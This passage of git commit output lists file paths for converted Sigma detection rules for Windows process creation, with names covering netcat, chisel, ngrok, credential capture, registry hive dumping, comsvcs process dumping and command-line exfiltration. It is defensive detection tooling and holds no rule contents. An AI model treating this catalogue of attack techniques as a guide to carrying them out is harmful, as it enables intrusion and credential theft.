tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_provlaunch_potential_abuse.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_provlaunch_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_psr_capture_screenshots.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_3proxy_execution.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_adfind_enumeration.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_adfind_susp_usage.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_advanced_port_scanner.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_advancedrun.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_chisel.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_cleanwipe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_crassus.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_csexec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_defendercheck.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_ditsnap.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_frp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_iox.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_mouselock_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_netcat.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_ngrok.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_nimgrab.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_nircmd.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_nircmd_as_system.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_nmap_zenmap.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_nps.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_nsudo.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_pingcastle.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_pingcastle_script_parent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_process_hacker.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_radmin.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_rcedit_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_rclone_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_runxcmd.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_seatbelt.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_system_informer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_webbrowserpassview.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_wsudo_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_python_adidnsdump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_python_inline_command_execution.yml 
create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_python_pty_spawn.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_query_session_exfil.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rar_compress_data.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rar_compression_with_password.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rar_susp_greedy_compression.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rasdial_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_add_run_key.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_add_safeboot.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_bitlocker.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_credential_access_via_password_filter.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_defender_exclusion.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_delete_safeboot.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_delete_services.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_desktop_background_change.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_direct_asep_registry_keys_modification.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_disable_sec_services.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_enumeration_for_credentials_in_registry.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_machineguid.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_modify_group_policy_settings.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_nolmhash.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_open_command.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_query_registry.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_rdp_keys_tamper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_screensaver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_service_imagepath_change.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_software_discovery.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_susp_paths.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_volsnap_disable.yml 
create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_windows_defender_tamper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_write_protect_for_storage_disabled.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regedit_export_critical_keys.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regedit_export_keys.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regedit_import_keys.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regedit_import_keys_ads.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regedit_trustedinstaller.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regini_ads.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regini_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_registry_cimprovider_dll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_registry_install_reg_debugger_backdoor.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_registry_logon_script.yml create 
mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_registry_new_network_provider.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_registry_privilege_escalation_via_service_key.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_registry_set_unsecure_powershell_policy.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_registry_typed_paths_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regsvr32_network_pattern.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regsvr32_remote_share.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regsvr32_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regsvr32_susp_exec_path_2.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regsvr32_susp_extensions.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regsvr32_susp_parent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regsvr32_uncommon_extension.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_remote_access_software_ultraviewer.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk_silent_install.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk_susp_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_remote_access_tools_gotoopener.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_remote_access_tools_logmein.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_remote_access_tools_netsupport.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_remote_access_tools_netsupport_susp_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_remote_access_tools_rurat_non_default_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect_anomaly.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_remote_time_discovery.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_adfind.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_autohotkey.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_autoit.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_binary.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_browsercore.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_cloudflared.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_createdump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_curl.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_dctask64.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_ftp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_gpg4win.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_jusched.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_mavinject.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_megasync.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_msdt.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_netsupport_rat.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_office_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_paexec.yml 
create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_pingcastle.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_plink.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_pressanykey.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_rurat.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_sysinternals_debugview.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_sysinternals_psexec_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_sysinternals_sdelete.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_vmnat.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_whoami.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rpcping_credential_capture.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_ruby_inline_command_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_ads_stored_dll_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_by_ordinal.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_inline_vbs.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_installscreensaver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_js_runhtmlapplication.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_keymgr.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_no_params.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_ntlmrelay.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_obfuscated_ordinal_call.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_parent_explorer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_registered_com_objects.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_run_locations.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_script_run.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_shell32_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_shelldispatch_potential_abuse.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_spawn_explorer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_susp_activity.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_susp_execution_with_image_extension.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_susp_shellexec_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_susp_shimcache_flush.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_sys.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_unc_path.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_uncommon_dll_extension.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_user32_dll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_webdav_client_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_without_parameters.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_runonce_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sc_create_service.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sc_disable_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sc_new_kernel_driver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sc_query.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sc_sdset_modification.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sc_service_path_modification.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sc_service_tamper_for_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sc_stop_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_appdata_local_system.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_change.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_creation_temp_folder.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_delete.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_delete_all.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_disable.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_env_folder.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_folder_combos.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_guid_task_name.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_one_time_only_midnight_task.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_parent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_persistence_windows_telemetry.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_powershell_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_reg_loader.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_reg_loader_encoded.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_schedule_type.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_schedule_type_system.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_susp_pattern.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_system.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_scrcons_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sdbinst_shim_persistence.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sdbinst_susp_extension.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sdclt_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sdiagnhost_susp_child.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_secedit_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_servu_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_setspn_spn_enumeration.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_shutdown_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_shutdown_logoff.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sndvol_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_soundrecorder_audio_capture.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_splwow64_cli_anomaly.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_spoolsv_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sqlcmd_veeam_db_recon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sqlite_chromium_profile_data.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sqlite_firefox_gecko_profile_data.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_squirrel_download.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_squirrel_proxy_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_ssh_port_forward.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_ssh_rdp_tunneling.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_ssm_agent_abuse.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_stordiag_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_16bit_application.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_abusing_debug_privilege.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_add_user_local_admin_group.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_add_user_remote_desktop_group.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_alternate_data_streams.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_always_install_elevated_windows_installer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_appx_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_archiver_iso_phishing.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_automated_collection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_child_process_as_system_.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_cli_obfuscation_unicode.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_commandline_path_traversal_evasion.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_copy_browser_data.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_copy_lateral_movement.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_copy_system_dir.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_crypto_mining_monero.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_disable_raccine.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_double_extension.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_double_extension_parent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_download_office_domain.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_dumpstack_log_evasion.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_elavated_msi_spawned_shell.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_electron_app_children.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_embed_exe_lnk.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_etw_trace_evasion.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_eventlog_clear.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_eventlog_content_recon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_execution_from_guid_folder_names.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_execution_from_public_folder_as_parent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_execution_path.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_execution_path_webserver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_file_characteristics.yml create mode 100644 